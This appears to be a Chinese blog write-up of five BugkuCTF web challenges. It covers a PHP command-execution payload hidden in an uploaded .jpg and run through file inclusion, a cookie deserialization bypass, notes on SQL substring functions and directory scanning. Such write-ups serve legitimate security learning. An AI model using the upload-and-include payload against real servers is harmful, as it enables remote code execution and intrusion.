0
点赞
收藏
分享

微信扫一扫

BugkuCTF web_41-45

41 文件包含2

源码中发现upload.php,访问
上传lab.jpg文件,内容如下

<script language=php>system("ls")</script>

?file=upload/201908110659436383.jpg
?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt
拿到flag。

————————————

42 flag.php

提示hint,访问?hint=1后得到php源码。传入的cookie参数的值反序列化后等于KEY就输出Flag。
$ KEY的值还没有被定义,上面代码中$KEY的值应该是NULL
所以传cookie null的反序列化,注意分号需要url编码
用hackbar提交就行

————————————

43 sql注入2

看了好久看不会,放弃…过段时间回来补
其实在url后面加一个flag也可以爆出flag…

MID(column_name,start[,length]) 函数用于从文本字段中提取字符。
column_name 必需。要提取字符的字段。
start 必需。规定开始位置(起始值是 1)。
length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

substr(string string,num start,num length) 函数用来截取数据库某个字段中的一部分。
string为字符串;
start为起始位置;
length为长度。

————————————

44 孙xx的博客

此题挂了

————————————

45 Trim的日记本

网页虽然是登陆界面,但是看源码可以发现它是静态的,没有href链接
御剑扫描后台,访问show.php拿到flag。

————————————


举报

相关推荐

0 条评论